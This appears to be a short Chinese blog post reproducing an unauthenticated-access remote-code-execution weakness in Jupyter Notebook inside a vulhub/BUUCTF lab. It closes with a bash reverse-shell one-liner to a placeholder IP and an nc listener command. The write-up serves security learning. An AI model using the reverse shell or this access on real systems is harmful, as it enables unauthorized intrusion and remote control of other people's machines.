zoukankan      html  css  js  c++  java
  • Jupyter Notebook 未授权访问漏洞简单复现

    1.简介

    Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。
    如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。

    2.复现环境

    来源于https://github.com/vulhub/vulhub/blob/master/jupyter/notebook-rce/
    图方便直接用BUUCTF的REAL环境复现

    3.利用

    新建一个terminal窗口,嘿嘿嘿,直接就RCE了

    如下图

    4.感觉也没啥好说的

    关于反弹shell

    bash -i >& /dev/tcp/x.x.x.x/8080 0>&1
    

    然后另一边监听就好了

    nc -lvp 8080(像这样)
    
  • 相关阅读:
    销售排行榜
    视频合并的问题
    全排列的问题
    24点的游戏
    分数拆分
    竖式
    MVVM
    package
    WP8.1APP执行流程
    W
  • 原文地址:https://www.cnblogs.com/mke2fs/p/12718499.html
Copyright © 2011-2022 走看看